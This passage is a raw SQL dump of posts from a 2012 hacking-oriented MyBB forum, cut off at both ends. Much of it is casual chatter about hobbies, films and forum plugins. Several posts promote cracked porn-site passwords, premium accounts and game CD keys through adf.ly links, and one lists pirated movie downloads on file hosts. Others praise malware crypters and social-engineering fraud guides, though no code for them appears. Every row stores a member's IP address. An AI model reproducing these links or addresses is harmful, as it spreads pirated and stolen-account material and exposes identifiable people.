'ef9a9a19df76fc29ff65e3e169185078', '0', '0'); INSERT INTO mybb_posts VALUES('6055', '1048', '0', '64', 'Good sports stream!', '0', '61', 'NXK', '1350877760', 'http://88.80.11.29/\r\n\r\n\r\nI like it, I use it to watch UFC.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72f63a20df99e3bd76f75ee9dd9dff0e', '0', '0'); INSERT INTO mybb_posts VALUES('6056', '1045', '6037', '49', 'RE: Group Format?', '0', '257', 'XxTREYZxX', '1350877951', 'yes i think it would awesome :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'ffd6d439e7c13448863694e9e345d240', '0', '0'); INSERT INTO mybb_posts VALUES('6057', '1049', '0', '49', 'User tagging anyone?', '0', '222', 'Exposé', '1350878377', 'I remember this awesome forum I was on a while ago that allowed members to tag other members in the post they made so for example..\r\n\r\nIf I wanted to get NXK\'s attention I could be like \"I <3 @NXK\" and it would send him a notification alerting him of that....\r\n\r\nI know some of you will be like yeh...people will spam it and shit but you can prob edit settings and shit...and not many people did.\r\n\r\nWhat do you guys think?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'efcda195f92fb2c383aac7dca6d34652', '0', '0'); INSERT INTO mybb_posts VALUES('6058', '1050', '0', '7', 'What do you do to relax?', '0', '205', 'mothered', '1350878540', 'Greetings to all,\r\n\r\nWith all our day to day computational stuff of hacking, cracking, etc, It can get pretty Intense. I know that\'s certainly the case with myself.\r\n\r\nSo what do you guys do to relax and take time out? I try to get around an hour\'s sleep (to ease the mind), and just watch a few YouTube videos, mainly music clips, and anything random to have a laugh over.\r\n\r\nYou guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'eba97f42eb9f2e84ca8450d586ae78ec', '0', '0'); INSERT INTO mybb_posts VALUES('6059', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '222', 'Exposé', '1350878667', 'Yeh with all my school, work and LH, I mostly just watch Netflix and just watch videos and shit...And play videos games ofc', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '0fc81c3c696c645c5d94ddd54f6afc81', '0', '0'); INSERT INTO mybb_posts VALUES('6060', '1051', '0', '58', 'Advertisers Applications', '0', '3', '??????????¢™', '1350880695', 'Thanks for your interest in helping out L33T Hacking getting new members.\r\n\r\nPlease post the answers to the questions you have received through PM below. Jok3r will then PM you your tasks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d7136c49c8057ec239c88f3b31aa430', '0', '0'); INSERT INTO mybb_posts VALUES('6061', '1052', '0', '65', 'Wrong Turn 5 found it kinda boring', '0', '1', 't3h jok3r', '1350881174', 'I watched Wrong Turn 5 yesterday morning and I found the ending boring, It didn\'t have any ending/climax. Other than that the movie was great.\r\n\r\nAny other reviews?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd41be1152b57b6276ff2ff2432e74150', '0', '0'); INSERT INTO mybb_posts VALUES('6062', '1049', '6057', '49', 'RE: User tagging anyone?', '0', '1', 't3h jok3r', '1350882012', 'It depends on the forums niche. No one makes announcements on someone else plus from this peoples profiles would get more cached by bots which will bring more results on Google so people can get DOXed more easier. \n\nThanks for the suggestion.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd04710fd3e91df1c6c40ed6fbbd61f6', '0', '0'); INSERT INTO mybb_posts VALUES('6063', '1052', '6061', '65', 'RE: Wrong Turn 5 found it kinda boring', '0', '2', 'Apathy', '1350882428', 'Is this a scary movie? I have not watched anything recently.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a61c545dec834500c7872c6d8a6314b7', '0', '0'); INSERT INTO mybb_posts VALUES('6064', '1052', '6061', '65', 'RE: Wrong Turn 5 found it kinda boring', '0', '222', 'Exposé', '1350882590', 'Lmao iv\'e seen like all of the wrong turns except this one...I believe like 2 of them have cannibal midget guys in them right lmao? If this is the same series?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '39a9c4de93ccfc3a02f5b743a3be7485', '0', '0'); INSERT INTO mybb_posts VALUES('6065', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '257', 'XxTREYZxX', '1350889402', 'I just have a sleep for a little bit then jump back on this :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '45435906920d1ce2d826571fa66052eb', '0', '0'); INSERT INTO mybb_posts VALUES('6066', '1046', '6046', '43', 'RE: Free PID\'s :D', '0', '62', 'R?????zo?', '1350889851', 'This been copy & pasted from my thread.\nhttp://l33thacking.net/thread-461.html\n\nsomeone please close.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'da995fa988a0566933ddb96c0f148e46', '0', '0'); INSERT INTO mybb_posts VALUES('6067', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '258', 'PiXEL^OG', '1350890066', '1. No i use all three of my email , some for work and other for normal day stuff\n2. No i don\'t , they are usually run by skids who think XSS is a computer trick\n3. I don\'t have twitter\n4. Google\n5. No i only have an account to watch videos\n6. Facebook only , but none of my friends know i do this\n7. Yup ive been on ubers since it was launched , Everyone knows me there im a respected member :)\n8. I don\'t have much spare time , sorry but i still love LH <3', '139.190.235.246', '-1950422026', '0', '0', '258', '1350890092', '1', '00baa7c72289c16a7653557a09aedef6', '0', '1350890092'); INSERT INTO mybb_posts VALUES('6068', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '257', 'XxTREYZxX', '1350890909', 'of course i will advertise LH\n1.no im very sorry only this one but i can make one\n2.no i dont sorry\n3.i dont have twiiter\n4.dont know what this means\n5.yes i do upload video\'s on you Tube.\n6.yes i am planet minecraft \n7.yes ubers and have been for a while now\n8.yes of course i will \nthere you go', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '65ed6c032cc562da27e774947786595e', '0', '0'); INSERT INTO mybb_posts VALUES('6069', '1046', '6046', '43', 'RE: Free PID\'s :D', '0', '222', 'Exposé', '1350892661', 'WTF....lol. I grabbed this off Fkn randomly bro. Mah bad....I never even saw ur thread lol.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dc87b262a3c19197cdace5a24a7618cc', '0', '0'); INSERT INTO mybb_posts VALUES('6070', '1053', '0', '54', 'Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 22.OKT.2012', '17', '255', 'sbhshroy2', '1350900766', 'click here http://adf.ly/Dubfk', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '9fac0d7da9224bebbaf9cb5b9fb6756d', '0', '0'); INSERT INTO mybb_posts VALUES('6071', '1054', '0', '54', '[22 oct] Tonightsgirlfriend x 5 freshly cracked*No Download*', '17', '255', 'sbhshroy2', '1350900859', 'click here http://adf.ly/DudIS', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '80d2f8139170e50b1a59863c28bc9bf3', '0', '0'); INSERT INTO mybb_posts VALUES('6072', '1055', '0', '54', 'rapidshare Premium Account *No Download*', '17', '255', 'sbhshroy2', '1350900941', 'click here http://adf.ly/Ducx4', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '51b9aa74a24080dda675e981bf3d049e', '0', '0'); INSERT INTO mybb_posts VALUES('6073', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '62', 'R?????zo?', '1350900972', 'just work work and work, also spend the free time with my girl', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', 'fe268b459bbf890590635dfc8dd73e8e', '0', '0'); INSERT INTO mybb_posts VALUES('6074', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350901080', 'just make it light green, should look cool.\nalso the links on the signatures is still locked too, any way to fix it?', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '113e17a887a6d16b79ffb22fb7227fd8', '0', '0'); INSERT INTO mybb_posts VALUES('6075', '945', '5288', '7', 'RE: I dont want.......', '0', '62', 'R?????zo?', '1350901173', 'looks like it\'s fixed with the new plugin though :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '2fbab27e82b46b52b10aca4f9984a686', '0', '0'); INSERT INTO mybb_posts VALUES('6076', '1048', '6055', '64', 'RE: Good sports stream!', '0', '62', 'R?????zo?', '1350901356', 'thanks for this, appreciated :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '4ed1043505d92509b3aa18c2ae829e81', '0', '0'); INSERT INTO mybb_posts VALUES('6077', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '62', 'R?????zo?', '1350901559', 'thanks it might come handy to troll friends :P', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '30903809c5b309f40ba7c0e9d10abcc8', '0', '0'); INSERT INTO mybb_posts VALUES('6078', '1035', '5983', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '62', 'R?????zo?', '1350901657', '[quote=\'??zg???g????61\' pid=\'5983\' dateline=\'1350861232\']\r\n:O thanks a TON dude! Could you post proof of the %100 FUD? Thanks :D\r\n[/quote]\r\n\r\nI might add it later bro, once I get home :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', '23dcf8edb7840463e4ba57f1ebc3a42e', '0', '0'); INSERT INTO mybb_posts VALUES('6079', '822', '6045', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350901940', '[quote=\'Apathy\' pid=\'6045\' dateline=\'1350875918\']\r\nWhen is this done? I really want to know if I made it.\r\n[/quote]\r\n\r\nThe Download link is already updated in the thread. Everyone can download it now', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4145cc35f805eb6fb6de2b507f128149', '0', '0'); INSERT INTO mybb_posts VALUES('6080', '1055', '6072', '54', 'RE: rapidshare Premium Account *No Download*', '0', '228', 'VirtualLegend', '1350902051', 'Thanks for the share bro!!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e24a3a1a82913200a49b849b02a5e9ed', '0', '0'); INSERT INTO mybb_posts VALUES('6081', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '228', 'VirtualLegend', '1350902256', 'Great share i think it\'s the only SEO share on LH', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4ec49367ad6c2266b3e38aa1a5e449d6', '0', '0'); INSERT INTO mybb_posts VALUES('6082', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '228', 'VirtualLegend', '1350902334', 'Looks Legit, Thanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c54eb71e6654683bfa5f839ad3801f77', '0', '0'); INSERT INTO mybb_posts VALUES('6083', '1056', '0', '9', 'make money by shortening websites', '17', '255', 'sbhshroy2', '1350902461', 'earn more than 300$ per month by adf\r\ngo and sign up free and then write any site such as google.com and u get a short link for this site, copy the short link and past it to facebook, twitter or other social sites and whrn people visit u got money.\r\nu get 4.5$ per 1000visit\r\nand u get 20% of referrals earning\r\n\r\n\r\n[size=large][url=http://adf.ly/?id=2559700]clcik here for sign up[/url][/size]', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '58b34e26e12be279da81e9dd7cf847aa', '0', '0'); INSERT INTO mybb_posts VALUES('6084', '1049', '6057', '49', 'RE: User tagging anyone?', '0', '228', 'VirtualLegend', '1350902512', 'Looks very handy for me :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'af54c169fd66ac15360024e9bca0ab3f', '0', '0'); INSERT INTO mybb_posts VALUES('6085', '918', '5088', '65', 'RE: I feel famous', '0', '228', 'VirtualLegend', '1350902619', 'Do you already have adsense on your YT account. And how much did you maked?\n[hr]\nDo you have adsense on your YT channel\n[hr]\nDo you have adsense on your YT channel\n[hr]\nDo you have adsense on your YT channel\n[hr]\nDo you have adsense on your YT channel\n[hr]\nLol i found a bug with the new plugin', '83.83.167.183', '1397991351', '1', '0', '228', '1350902691', '1', '7c17ab777e4c6e371ef189f040c0267c', '0', '0'); INSERT INTO mybb_posts VALUES('6086', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350902672', 'thanks for the feedback guys, Enjoy :)', '46.50.70.120', '775046776', '1', '0', '0', '0', '1', 'd66d481af60534a362a315ea1be8b6a9', '0', '0'); INSERT INTO mybb_posts VALUES('6087', '1057', '0', '9', 'oldest ptc site with more earning option', '17', '255', 'sbhshroy2', '1350902831', 'guaranted income earn lots of money by clicking ads\r\nit is the oldest ptc site who pays user from 12 yrs\r\njoin and earn lots of money.\r\nPaid to Click - Click on ads and get paid up to 0.01$ each Paid to\r\nRead - Read short ads followed by a quick look at a page, paid up to\r\n0.0025$ each..\r\nget upto 0.01$ referral per click\r\nu earn upto 12$ per day doing small jobs.\r\n\r\nMinimum payout is as low as 2$ via paypal and you will receive your payment\r\nwithin 24-72 hours!\r\n\r\njoin by clicking\r\n\r\nhttp://adf.ly/DvahO', '112.110.15.228', '1886261220', '0', '0', '255', '1350903461', '1', 'e85745f94d9a94b8bcaedecbfb3c5643', '0', '1350903461'); INSERT INTO mybb_posts VALUES('6092', '1059', '0', '9', 'new ptc site with more earning option', '17', '255', 'sbhshroy2', '1350903502', 'guaranted income earn lots of money by clicking ads\r\n\r\njoin and earn lots of money.\r\nPaid to Click - Click on ads and get paid up to 0.01$ each Paid to\r\nRead - Read short ads followed by a quick look at a page, paid up to\r\n0.0025$ each..\r\nSign up - Complete sign up offers for free sites and receive 5-25 cents.\r\nPaid to Promote -Promote Scarlet-clicks.info and get up to 0.20$ CPM.\r\nClick Exchange - Click to earn x-credits and use it to advertise what you want.\r\n40% DOWNLINE EARNINGS! (Up to 100% for Upgraded members)\r\nMinimum payout is as low as 0,3$ and you will receive your payment\r\nwithin 24-72 hours!\r\nWe have some special offers and memberships so be sure to check those out.\r\njoin by clicking\r\n\r\n\r\n\r\n\r\nhttp://adf.ly/DvamZ', '112.110.15.228', '1886261220', '0', '0', '0', '0', '1', '75e49b2dc7f6b0430c5c9da937caa4b7', '0', '0'); INSERT INTO mybb_posts VALUES('6088', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1350903009', 'Probably not FUD but I\'m assuming is like %90 UD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ddd3c6643a71b7f32ead76552ad2350d', '0', '0'); INSERT INTO mybb_posts VALUES('6089', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '100', '??zg???g????61', '1350903078', 'Holy jesus, thanks man. This is huge.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9dbc8fd8a9c79462097ffbb43164a129', '0', '0'); INSERT INTO mybb_posts VALUES('6090', '1058', '0', '24', 'Microsoft or Apple', '0', '228', 'VirtualLegend', '1350903117', '[color=#1E90FF][size=medium][align=center][color=#9400D3]The Title says it all, What do you think is better Microsoft or Apple. \r\n\r\nI prefer Microsoft because i don\'t like Apple products so much. Only the Ipad and the Iphone (That each years becomes bigger until it\'s a ipad) :P\r\n\r\nWhat do you think? Post your Comment Below[/color][/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bb0c868b7dc9538d062e553bf84acb08', '0', '0'); INSERT INTO mybb_posts VALUES('6091', '902', '6053', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350903396', '[quote=\'Apathy\' pid=\'6053\' dateline=\'1350877006\']\r\nHave you made it yet? :P\r\n[/quote]\r\n\r\nNo, I have lost my hole project on VB', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1fab8e4b97964eef0b7ff03bd19ae53a', '0', '0'); INSERT INTO mybb_posts VALUES('6093', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350905653', 'Thanks bro I\'m trying :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'fbb9729dabd6f1c4e5fce172a3e4f108', '0', '0'); INSERT INTO mybb_posts VALUES('6094', '1039', '5998', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '62', 'R?????zo?', '1350905746', '[quote=\'iTzIpod\' pid=\'5998\' dateline=\'1350862037\']\r\nI\'ve seen this method multiple times. I don\'t think it\'ll help a person like me though. :p\r\nBut oh well.\r\nDifferent people = Different opinions.\r\n:)\r\n\r\nI would\'ve leaked it onto LH but then I thought it was LQ and wouldn\'t help anyone.\r\nAgain, that\'s my opinion.\r\n[/quote]\r\n\r\nyeah that\'s true but have you seen the SE guide this same guy made?\r\nI\'ts awesome.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '56c303cb065b06cbeb96cc0cbc42aacd', '0', '0'); INSERT INTO mybb_posts VALUES('6095', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1350905806', 'Enjoy your stay VirtualLegend! :)', '24.212.197.164', '416597412', '1', '0', '82', '1350905817', '1', '47bf14f5255e4c06b3d7348bdbcf8f6d', '0', '1350905817'); INSERT INTO mybb_posts VALUES('6096', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '62', 'R?????zo?', '1350905861', 'Looks legit bro, thanks for the share :D', '94.132.244.168', '1585771688', '1', '0', '62', '1350905906', '1', '2eed3bb20bdcc0b25d3c3072312374ea', '0', '1350905906'); INSERT INTO mybb_posts VALUES('6097', '1047', '6049', '16', 'RE: Get free Otterbox cases!', '0', '82', 'iTzIpod', '1350905931', 'I always wanted to SE items from Otterbox but I didn\'t know the guide :p\n\nThanks.\nWill try and post results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9383dd24596a049eecded69499fcd152', '0', '0'); INSERT INTO mybb_posts VALUES('6098', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '62', 'R?????zo?', '1350905972', 'was not from SE.net, I didn\'t even knew that site :P\nOh well, might help some people though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a58093b45e5daa7b88292ef1058c99c0', '0', '0'); INSERT INTO mybb_posts VALUES('6099', '212', '6044', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350905987', '[quote=\'t3h jok3r\' pid=\'6044\' dateline=\'1350875829\']\r\nYou got saved by Ipods post :)\r\n\r\nGroup Approved. Group will be added soon.\r\n[/quote]\r\n\r\nLol what if I didn\'t post that?\r\nWhat would happen?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97cac64983130f96aa376d649347e3eb', '0', '0'); INSERT INTO mybb_posts VALUES('6100', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350906029', 'Always glad to help :)\nEnjoy.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ab35384d9cbc65bc7599c1b2e30b998f', '0', '0'); INSERT INTO mybb_posts VALUES('6101', '1045', '6037', '49', 'RE: Group Format?', '0', '82', 'iTzIpod', '1350906070', 'I\'ve always wanted this plugin :p\nIt\'s really cool but t3h jok3r declined it. \n\nI\'m tired of Unique User\'s Usernames being Gray/Grey :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8eb0aab8daf344ea5bff86e2f424fec', '0', '0'); INSERT INTO mybb_posts VALUES('6102', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '62', 'R?????zo?', '1350906095', 'I decided to share it for premium users so Elite actually means something and worth to upgrade :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7bd118b87718c239d2d59bc582385b64', '0', '0'); INSERT INTO mybb_posts VALUES('6103', '945', '5288', '7', 'RE: I dont want.......', '0', '82', 'iTzIpod', '1350906105', '/Request Close Thread?\n\nReported.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d060ca3bae7cc4d14484f2864829221', '0', '0'); INSERT INTO mybb_posts VALUES('6104', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '62', 'R?????zo?', '1350906130', 'No problem, enjoy guys. :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '85fe443e839d9464ba788f88546e0d4b', '0', '0'); INSERT INTO mybb_posts VALUES('6105', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350906200', '@Reloadzor, we can give that a try.\nBut to fix that problem, you have to post?\nThe plugin blocks ALL the links on the page. I\'m pretty sure.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9b2c42fb3c4c7b29791e0ceaad656f8', '0', '0'); INSERT INTO mybb_posts VALUES('6106', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '82', 'iTzIpod', '1350906234', 'I hang out on forums now.\nKinda talk to some girls. Pretty much it :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ab0a4e2b967b2c1923d64dd6a923e69', '0', '0'); INSERT INTO mybb_posts VALUES('6107', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '82', 'iTzIpod', '1350906278', 'Posting to check it out.\nHoping it\'s a great site! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2c31aa8ad89819ffc287cf5c9856a112', '0', '0'); INSERT INTO mybb_posts VALUES('6108', '918', '5088', '65', 'RE: I feel famous', '0', '82', 'iTzIpod', '1350906344', 'What\'s the bug?\nYou probably clicked Post Reply a couple times. That\'s why ^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1f20bda98d1ed5dfeb2565daef9bcf4c', '0', '0'); INSERT INTO mybb_posts VALUES('6109', '1045', '6037', '49', 'RE: Group Format?', '0', '228', 'VirtualLegend', '1350907113', 'This is a Awesome idea Keep it Up Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a84cb155a1bb2c9006419001da4a9c87', '0', '0'); INSERT INTO mybb_posts VALUES('6110', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '228', 'VirtualLegend', '1350907166', 'Playing soccer outside :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cd18e75dacdd2bba5567180032ed3607', '0', '0'); INSERT INTO mybb_posts VALUES('6111', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350909173', 'yeah if you post it fix that but still pretty annoying if you ask me.\nLike since your signature has 2 links it blocks two times.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '0a333b6b58bc07943001cefbf425d060', '0', '0'); INSERT INTO mybb_posts VALUES('6112', '1045', '6101', '49', 'RE: Group Format?', '0', '62', 'R?????zo?', '1350909296', '[quote=\'iTzIpod\' pid=\'6101\' dateline=\'1350906070\']\r\nI\'ve always wanted this plugin :p\r\nIt\'s really cool but t3h jok3r declined it. \r\n\r\nI\'m tired of Unique User\'s Usernames being Gray/Grey :/\r\n[/quote]\r\n\r\n^this, even though I\'m an upgraded member my username is grey like the other normal members, just because I decide to use Unique userbar.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '2392a216558e9b668580b6773f36c0c8', '0', '0'); INSERT INTO mybb_posts VALUES('6113', '1027', '5909', '58', 'RE: [ Updated ] Marketers Group Request', '0', '62', 'R?????zo?', '1350909386', 'Hope it gets approved and I could be part of this group, I see my sexy user bar there :P', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '1606ef7f7bbbfcefe6aa52d8ca412bf0', '0', '0'); INSERT INTO mybb_posts VALUES('6114', '212', '5973', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '62', 'R?????zo?', '1350909596', '[quote=\'VirtualLegend\' pid=\'5925\' dateline=\'1350847250\']\n[quote=\'iTzIpod\' pid=\'5921\' dateline=\'1350846077\']\nGood luck Virtual with the group.\nSeems nice.\nWishing to join it and become successful and a great addition to LH.\n[/quote]\n\nIf the group is official i will add you as a member.\n[/quote]\n\nHow about me? :(\n\nOT: Nice to see that The Marketers got approved :)', '188.140.93.237', '-1131651603', '1', '0', '62', '1350909671', '1', '426c5a3c54473e25cefa760507d21653', '0', '1350909671'); INSERT INTO mybb_posts VALUES('6115', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '62', 'R?????zo?', '1350910419', 'thanks for sharing this, I will have a look.', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', 'c3ad04bd07d96db3c9a2fc232389f39f', '0', '0'); INSERT INTO mybb_posts VALUES('6116', '1060', '0', '3', '[Bug] with the new plugin', '0', '62', 'R?????zo?', '1350910705', 'So this new plugin to post and to see the link, it\'s great but I don\'t know if it\'s just me or everyone is having this problem\nWhen I use quick reply at the bottom of the thread and I type whatever I want and then hit \'post reply\' it simply just refresh the page, what I type is still on the box and my post is done, I have to press F5 to be able to see my post, I thought this was my computer who\'s fucked up but I tried on 2 computers here at work and even on my phone it\'s the same, I think it\'s something with the new plugin?\n\nOh well just try it yourself and see.\n\nhttps://www.google.com/\n\nEDIT: This is not me, it\'s happening to another members too\n[spoiler] [img]http://i.imgur.com/2JFGz.png[/img] [/spoiler]', '188.140.93.237', '-1131651603', '1', '0', '62', '1350910956', '1', '2dd6f4314d068d1332fc1b501b72a769', '0', '1350910956'); INSERT INTO mybb_posts VALUES('6117', '918', '6108', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350910979', '[quote=\'iTzIpod\' pid=\'6108\' dateline=\'1350906344\']\r\nWhat\'s the bug?\r\nYou probably clicked Post Reply a couple times. That\'s why ^\r\n[/quote]\r\n\r\nI think he meant this bug.\r\nhttp://l33thacking.net/thread-1060.html', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '320fa2519fe5c9049816f1f9a70abb25', '0', '0'); INSERT INTO mybb_posts VALUES('6118', '1061', '0', '64', '[FREE] HUGE MOVIE LIST [DOWNLOAD]', '0', '62', 'R?????zo?', '1350911319', '[quote]\r\n[php][B]All Cops Are Bastards BRRip 2012[/B]\r\n[CODE]http://turbobit.net/nvqhve09ko9p/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47462844/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/kcc1sgth/All.Cops.Are.Bastards.BRRip.2012.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/cwd1g5d7/All.Cops.Are.Bastards.BRRip.2012.rar[/CODE]\r\n\r\n[B]Thats My Boy 2012 BRRip XviD[/B]\r\n[CODE]http://turbobit.net/7qgymotb5ja6/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47462636/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/cwwr2dph/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/oobuqukf/Thats.My.Boy.2012.BRRip.XviD.AC3-BTRG.avi.rar[/CODE]\r\n\r\n[B]The Hunger Games 2012BRRip XviD[/B]\r\n[CODE]http://turbobit.net/7jmryxmfrhsq/The.Hunger.Games.2012BRRip.XviD-B89.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47462962/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/a0kpl54s/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/615eiybn/The.Hunger.Games.2012.PL.BRRip.XviD-B89.rar[/CODE]\r\n\r\n[B]Moonrise Kingdom 2012 BDRip XVID[/B]\r\n[CODE]http://turbobit.net/1ww3pk9aec8l/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464783/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/1n60xyuk/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/2ifb3bvh/Moonrise.Kingdom.2012.BDRip.XVID.AC3.HQ.Hive-CM8.avi[/CODE]\r\n\r\n[B]Super Cyclone 2012 480p BluRay x264[/B]\r\n[CODE]http://turbobit.net/9668qsp6nvup/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv.html[/CODE]\r\n[CODE]http://freakshare.com/files/rd8vnjhb/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv.html[/CODE]\r\n[CODE]http://uploaded.net/file/6gcejvzz/Super.Cyclone.2012.480p.BluRay.x264-mSD.mkv[/CODE]\r\n\r\n[B]Resident Evil Damnation 2012 BRRiP XviD[/B]\r\n[CODE]http://turbobit.net/ykfnmq84qb7z/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47463918/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/httleqso/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/j26be8j0/Rsidnt.Evil.Dmntion.2012.TR.BRRiP.XviD.avi[/CODE]\r\n\r\n[B]Mission Impossible - Ghost Protocol 2011[/B]\r\n[CODE]http://turbobit.net/8riu1h7bzvhc/Mission.Impossible.Ghost.Protocol.2011.TRUEFRENCH.BRRiP.XviD.AC3-AUTOPSiE.avi.html[/CODE]\r\n\r\n[B]Wish You Were Here 2012 BRRip 